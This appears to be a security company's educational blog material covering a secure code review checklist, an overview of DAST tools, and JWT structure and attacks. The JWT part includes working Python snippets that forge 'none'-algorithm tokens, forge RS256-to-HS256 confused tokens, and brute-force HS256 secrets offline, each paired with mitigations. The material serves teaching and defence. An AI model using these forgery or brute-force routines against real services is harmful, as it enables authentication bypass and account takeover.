From the perspective of our team of penetration testers, secure code review is a vital ally in reporting security findings. It allows us to understand the inner workings of applications, to correlate our dynamic testing findings with our static testing findings, and to increase the automated test coverage we can apply. This is a powerful combination of both SAST and DAST techniques, each with its individual pros and cons. We employ the two techniques in combination because it is more powerful than either performed individually, which allows our team to deliver high-quality reports to our clients.

[Want to learn the basics before you read on? Check out simplified secure code review.]

While searching through countless published code review guides and checklists, we found a gap that lacked a focus on quality security testing. With that, we built the following list as a compilation of OWASP code review, strong components of other lists, and added a few of our own.

Below you’ll find the procedure to follow when beginning a secure code review along with the accompanying checklist, which can be downloaded for your use

Secure Code Review Checklist

1.  Download the version of the code to be tested.

2. Look at the file / folder structure.

  • We are looking for how the code is laid out, to better understand where to find sensitive files.
  • Confirm there is nothing missing.

3.  Open the code in an IDE or text editor. The tool should have the following capabilities:

  • Open many files quickly.
  • Multiple search tabs to refer to old search results.
  • Regular expressions.

This allows us to perform searches against the code in a standard way.

4. Search through the code for the following information:

  • Configuration files
  • These can be used for authentication, authorization, file upload, database access, etc. Does the application use Ruby on Rails or Java Spring?
  • Application routes
  • How does user input map to the application?
  • Sensitive keywords
  • Password, token, select, update, encode, decode, sanitize, filter.
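The keyword search in step 4 can be scripted. Below is a minimal Python sketch of our own (not a Software Secured tool) that greps a source tree for the sensitive keywords listed above; the file extensions and the exact keyword list are assumptions you would tune per project.

```python
import re
from pathlib import Path

# keyword list taken from step 4 of the checklist
KEYWORDS = re.compile(
    r"password|token|select|update|encode|decode|sanitize|filter", re.IGNORECASE)

def scan_lines(filename, lines):
    """Return (filename, line_number, stripped_line) for each keyword hit."""
    return [(filename, number, line.strip())
            for number, line in enumerate(lines, 1)
            if KEYWORDS.search(line)]

def scan_tree(root, suffixes=(".py", ".rb", ".java", ".js", ".cs")):
    """Walk a source tree and collect keyword hits from code files."""
    hits = []
    for path in Path(root).rglob("*"):
        if path.is_file() and path.suffix in suffixes:
            hits.extend(scan_lines(str(path),
                                   path.read_text(errors="ignore").splitlines()))
    return hits
```

The hits give the reviewer a worklist of files and line numbers to inspect by hand; they are starting points, not findings.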

5. Scan the code with an assortment of static analysis tools (for example, on Java applications we would use SpotBugs with the FindSecBugs plugin). I’ve included a list below that describes the scanners we use:

  • Java - SpotBugs + FindSecBugs
  • Ruby - Brakeman
  • Python - Bandit
  • .NET - Roslyn Security Guard
  • JavaScript - ESLint with security rules and Retire.js
  • Third Party Dependencies - DependencyCheck

Here is a valuable list of SAST tools that we reference when we require different scanners.

6. Check every result from the scanners that are run against the target code base. Valid security issues are logged into a reporting tool, and invalid issues are crossed off. For each result that the scanner returns we look for the following three key pieces of information:

  • Source
  • Sink
  • Any transformations that occur on the data that flows from source to sink.

By following this format, the tester can reliably determine whether a security finding from the scanner is valid. Once the three pieces of information are known, it becomes straightforward to discern whether the issue is real.
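As an illustration of this triage, consider a hypothetical finding (invented for this example) where all three pieces are easy to read off:

```python
def build_query(user_id):
    # source: `user_id` arrives from an untrusted HTTP parameter
    # transformation: none -- the value is concatenated as-is
    # sink: the string is destined for SQL execution
    # With no sanitizing transformation between source and sink,
    # this finding would be logged as a valid SQL injection.
    return "SELECT * FROM users WHERE id = " + user_id
```

Had the code escaped or parameterized `user_id` on the way to the sink, the same scanner hit would be crossed off as a false positive.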

While checking each result, audit the file for other types of issues. Scanners will often flag the wrong category for a piece of code. Reviewing each result this way also helps the tester better understand the application they are testing.

For each issue, question your assumptions as a tester. The code plus the docs are the truth and can be easily searched.

7. Once we find a valid issue, we perform search queries on the code for more issues of the same type. This is done by running regex searches against the code, and it usually uncovers copy-and-pasted code.

8. Search for documentation on anything the tester doesn’t understand. This helps the tester gain insight into whether the framework/library is being used properly.

A key activity for the tester is to take notes of anything they would like to follow up on. A security review is time-sensitive, and the tester cannot afford to waste time searching for issues that aren’t there. Taking notes of items to come back to while reviewing the scanner results keeps the tester from getting stuck on anything. This is done for the entirety of the review and serves as a log of what has been done and checked.

The secure code review checklist, in combination with the process described above, sums up how we at Software Secured approach secure code review. This approach has delivered many quality issues into the hands of our clients, helping them assess their risk and apply appropriate mitigations. By following a strict, regimented approach, we maintain and increase the quality of our product, which is delivered to happy clients.

Below is the downloadable checklist which can be used to audit an application for common web vulnerabilities.

Resources

DAST Tools: What They Are Good At Finding

Your application is secure? Prove it!

In a galaxy far, far away, there is a dark magic button that finds all security vulnerabilities in every application ever created or yet to be created. No specific knowledge is required: just press the button and get results.

It sounds a bit unrealistic, but that’s how Dynamic Application Security Testing (DAST) tools work, at least from the user’s perspective. DAST uses a black-box testing methodology: no knowledge of the application’s code, structure, or internal architecture is required. You must find the inputs, define what a normal output is and what an exception is, and then test each of them. DAST requires a running instance of the application, and it measures the completeness of a scan with a path coverage metric: if all possible inputs were tested, path coverage is 100%.


To provide good coverage the DAST tool needs to “learn” an application by visiting web pages and extracting URLs for other pages. It can be a fully automated process where the DAST tool scans and tries to find all inputs, or it can be done with the assistance of people and other resources. DAST tools can act as a proxy, listening to traffic and “learning” the application. Manual (a user visits the website) or automated (recorded user’s actions are re-played with web driver) browsing can be used to generate starting points for DAST tools.
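As a rough illustration of this “learning” phase, here is a minimal Python sketch of the link-extraction step a crawler performs; real DAST tools also handle forms, scripts, cookies, and session state.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin

class LinkExtractor(HTMLParser):
    """Collect absolute URLs from anchor tags, the way a crawler seeds a scan."""
    def __init__(self, base_url):
        super().__init__()
        self.base_url = base_url
        self.links = set()

    def handle_starttag(self, tag, attrs):
        if tag == "a":
            for name, value in attrs:
                if name == "href" and value:
                    # resolve relative links against the page URL
                    self.links.add(urljoin(self.base_url, value))

extractor = LinkExtractor("http://example.com/app/")
extractor.feed('<a href="login">Login</a> <a href="/admin">Admin</a>')
```

Each discovered URL becomes a new page to fetch and parse in turn, which is how the crawl expands until no new inputs are found.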


Once inputs are defined, an active scan phase begins: numerous requests are sent to the application to detect deviations from expected results. While DAST is essential for application security testing, it cannot provide a complete overview of all vulnerabilities. Not all reported bugs are actual vulnerabilities; DAST tools can generate a lot of false positives. However, confirmed issues can often be easily re-tested.

DAST tools operate at runtime, and they work best for finding authentication, session management, and access control issues. Because it is black-box testing with no knowledge of the context, some issues can be related to the use of third-party components. Various misconfigurations can also be found only at runtime.

DAST is also as effective as static code analyzers at finding various injection issues. The most notorious are SQL injection, cross-site scripting, and OS command injection. Buffer overflow is another critical vulnerability that DAST can find by fuzzing user input, sending specific combinations of characters to crash an application.
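The fuzzing idea can be sketched in a few lines of Python. The `toy_parser` target below is a stand-in of our own invention that “crashes” past a fixed buffer size; a real DAST tool would deliver its payloads over HTTP and watch for server errors instead of exceptions.

```python
def fuzz(target, payloads):
    """Feed each payload to the target and record which ones crash it."""
    crashes = []
    for payload in payloads:
        try:
            target(payload)
        except Exception as exc:
            crashes.append((payload, type(exc).__name__))
    return crashes

def toy_parser(data):
    # hypothetical vulnerable input handler: it "crashes" once the
    # input exceeds a fixed 64-byte buffer, the way a C parser might
    if len(data) > 64:
        raise OverflowError("input exceeds buffer")
    return data

crashes = fuzz(toy_parser, ["ok", "A" * 65, "A" * 1000])
```

Every recorded crash is a lead for the tester: the payload that triggered it documents exactly which input shape the application fails to handle.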

The effectiveness of DAST depends on how well it knows the application and on the number of tests performed. It does not work as fast as static code analysis and it requires a working environment, but it is still a great way to test the whole application from an attacker’s perspective.

Security Issues in JWT Authentication

What is JWT Authentication?

JSON Web Token (JWT) is a JSON-encoded representation of one or more claims that can be transferred between two parties. The claim is digitally signed by the issuer of the token, and the party receiving this token can later use this digital signature to prove ownership of the claim.

JWTs can be broken down into three parts: header, payload, and signature. Each part is separated from the others by a dot (.), following the structure below:

Header.Payload.Signature

HEADER

The information contained in the header describes the algorithm used to generate the signature. The decoded version of the header from the example token looks like:

{
  "alg": "HS256",
  "typ": "JWT"
}

HS256 is the hashing algorithm (HMAC SHA-256) used to generate the signature in this example.

PAYLOAD


All the claims within JWT authentication are stored in this part. Claims are used to provide authentication to the party receiving the token. For example, a server can set a claim saying ‘isAdmin: true’ and issue it to an administrative user upon successful login. The admin user can then send this token with every subsequent request to prove their identity.

The decoded version of the payload from the example token looks like:

{
  "sub": "1234567890",
  "name": "John Doe",
  "iat": 1516239022
}

The ‘name’ field identifies the user to whom the token was issued. ‘sub’ and ‘iat’ are examples of registered claims and are short for ‘subject’ and ‘issued at’.

SIGNATURE


The signature part of a JWT is derived from the header and payload fields. The steps involved in creating this signature are described below:

1. Combine the base64url-encoded representations of the header and payload with a dot (.):

base64UrlEncode(header) + "." + base64UrlEncode(payload)
 
2. Hash the above data with a secret-key known only to the server issuing the token. The hashing algorithm is the one described in the header.

hash_value = hash([base64UrlEncode(header) + "." + base64UrlEncode(payload)], secret-key)

3. Base64url-encode the hash value obtained from the step above:

Signature = base64UrlEncode(hash_value)

Because the ‘secret-key’ is known only to the server, only the server can issue new tokens with a valid signature. Users cannot forge tokens, as producing a valid signature for a token requires knowledge of the ‘secret-key’.
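The three steps can be reproduced in Python with only the standard library. The secret below is an assumption on our part: it is jwt.io’s well-known demo key, which happens to produce the example token shown later in this article.

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    # JWT uses base64url encoding with the '=' padding stripped
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def sign_hs256(header, payload, secret):
    # Step 1: join the encoded header and payload with a dot
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    # Step 2: HMAC-SHA256 the signing input with the secret-key
    signature = hmac.new(secret, signing_input.encode(), hashlib.sha256).digest()
    # Step 3: base64url-encode the hash and append it
    return signing_input + "." + b64url(signature)

token = sign_hs256({"alg": "HS256", "typ": "JWT"},
                   {"sub": "1234567890", "name": "John Doe", "iat": 1516239022},
                   b"your-256-bit-secret")  # jwt.io's demo secret, assumed here
```

Verifying a token is the same computation run in reverse: recompute the signature over the first two segments and compare it to the third.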

JWTs find their application in various authentication mechanisms. They are typically passed in the Authorization header when a client submits a request to the server.

e.g.:
Authorization: Bearer eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ.SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c


Attacks Against JWT

Tampering with the Signing Algorithm:

‘none’ algorithm: JWT supports the use of the ‘none’ algorithm for use cases where the integrity of the claims within the JWT is already verified by other means. This algorithm allows the server to issue a JWT without a signature. A token issued with the ‘none’ algorithm looks like the following:

 

{"alg":"none","typ":"JWT"}.{"sub":"1234567890","name":"John Doe","iat":1516239022}.

It is worth noting that the ‘none’ algorithm and HMAC SHA-256 (HS256) are the only two algorithms that are mandatory to implement according to the JWT standard.

Attackers can use this feature to set the algorithm in their token to ‘none’ and provide an empty signature to fool the server into accepting it as a valid token. However, most of the modern implementations now have an added security check that rejects tokens set with ‘none’ algorithm when a secret-key was used to issue them.
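Forging such a token takes only a few lines. The sketch below (standard library only, with claim values invented for the illustration) shows why an empty signature segment must never be accepted:

```python
import base64
import json

def b64url(data):
    # base64url encoding with the '=' padding stripped, as JWT uses
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_none_token(payload):
    """Build an unsigned token: 'none' algorithm, empty signature segment."""
    header = {"alg": "none", "typ": "JWT"}
    return (b64url(json.dumps(header, separators=(",", ":")).encode()) + "."
            + b64url(json.dumps(payload, separators=(",", ":")).encode()) + ".")

forged = forge_none_token({"sub": "1234567890", "isAdmin": True})  # invented claims
```

Verifiers defend against this by pinning the expected algorithm; with PyJWT, for example, `jwt.decode(token, key, algorithms=["HS256"])` rejects any token whose header advertises a different algorithm.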

RS256 to HS256: JWT supports the use of asymmetric signing algorithms such as RS256, which uses a private key to sign the token and a public key to verify the signature. The private key is known only to the server, while the public key is accessible to everyone.

The use of asymmetric signing algorithms is useful in situations where third-party clients need to verify the validity of a JWT they did not issue. A server signing JWTs with a symmetric algorithm such as HS256 would have to share the secret-key with every third-party client that wants to verify the token, which increases the risk of the secret-key being disclosed.

In insecure implementations where the server trusts the data inside the header of a JWT and doesn’t validate the algorithm used to issue a token, attackers can change the algorithm from ‘RS256’ to ‘HS256’ and use the public key to generate an HMAC signature for the token. The server will then treat this token as one generated with the ‘HS256’ algorithm and use its public key as the HMAC secret to verify it.
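A sketch of the confusion attack, with a placeholder PEM standing in for the server’s real public key (both the PEM bytes and the claims are invented for the example):

```python
import base64
import hashlib
import hmac
import json

def b64url(data):
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()

def forge_rs256_to_hs256(payload, public_key_pem):
    """Advertise HS256 in the header and HMAC-sign with the server's
    *public* key bytes. A verifier that trusts the header will recompute
    the same HMAC with the public key it already holds and accept it."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = (b64url(json.dumps(header, separators=(",", ":")).encode())
                     + "." + b64url(json.dumps(payload, separators=(",", ":")).encode()))
    signature = hmac.new(public_key_pem, signing_input.encode(),
                         hashlib.sha256).digest()
    return signing_input + "." + b64url(signature)

# placeholder PEM bytes; a real attack would use the server's actual public key
fake_pem = b"-----BEGIN PUBLIC KEY-----\nMIIB...AB\n-----END PUBLIC KEY-----"
forged = forge_rs256_to_hs256({"sub": "1234567890", "isAdmin": True}, fake_pem)
```

The fix is the same as for the ‘none’ attack: never let the token’s header choose the verification algorithm; pin it server-side.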

Brute-Forcing HS256:
JWTs signed with the HS256 algorithm can be vulnerable to secret-key disclosure, which usually happens through brute-force attacks, especially against weak keys. Since a client does not need to interact with the server to check a secret-key guess once a token has been issued, attackers can conduct offline brute-force attacks against the token using wordlists of possible secret-keys.

It is recommended to use sufficiently long (256-bit) keys to safeguard against these attacks.
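An offline brute force needs nothing but the token and a wordlist, as this Python sketch shows (the weak secret ‘hunter2’ and the token contents are invented for the demonstration):

```python
import base64
import hashlib
import hmac

def brute_force_hs256(token, wordlist):
    """Try each candidate secret offline; no server interaction is needed."""
    signing_input, _, sig_b64 = token.rpartition(".")
    # restore the stripped '=' padding before decoding the signature
    signature = base64.urlsafe_b64decode(sig_b64 + "=" * (-len(sig_b64) % 4))
    for guess in wordlist:
        candidate = hmac.new(guess.encode(), signing_input.encode(),
                             hashlib.sha256).digest()
        if hmac.compare_digest(candidate, signature):
            return guess
    return None

# victim token built with a deliberately weak secret for the demonstration
signing_input = "eyJhbGciOiJIUzI1NiJ9.eyJzdWIiOiJhZG1pbiJ9"
weak_sig = base64.urlsafe_b64encode(
    hmac.new(b"hunter2", signing_input.encode(), hashlib.sha256).digest()
).rstrip(b"=").decode()
victim_token = signing_input + "." + weak_sig

recovered = brute_force_hs256(victim_token, ["letmein", "hunter2", "password1"])
```

A random 256-bit key makes this search computationally infeasible, which is exactly why the key-length recommendation above matters.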

Sensitive Information Disclosure:
All the information inside the payload is stored in plain text. It is important not to leak sensitive information, such as internal IP addresses, through the tokens.
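Reading the payload requires no key at all, as this sketch shows using the example token from earlier in the article:

```python
import base64
import json

def decode_payload_unverified(token):
    """The payload is only base64url-encoded, not encrypted:
    anyone holding the token can read every claim."""
    payload_b64 = token.split(".")[1]
    payload_b64 += "=" * (-len(payload_b64) % 4)  # restore stripped padding
    return json.loads(base64.urlsafe_b64decode(payload_b64))

claims = decode_payload_unverified(
    "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9."
    "eyJzdWIiOiIxMjM0NTY3ODkwIiwibmFtZSI6IkpvaG4gRG9lIiwiaWF0IjoxNTE2MjM5MDIyfQ."
    "SflKxwRJSMeKKF2QT4fwpMeJf36POk6yJV_adQssw5c")
```

This is why secrets belong server-side: a claim inside a JWT should identify the user, not carry confidential data.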

Attacks against JWT arise from bad implementations and outdated libraries. To benefit from the security features JWT offers, follow the best practices for implementing them, use only up-to-date and secure libraries, and choose the right algorithm for your use case.

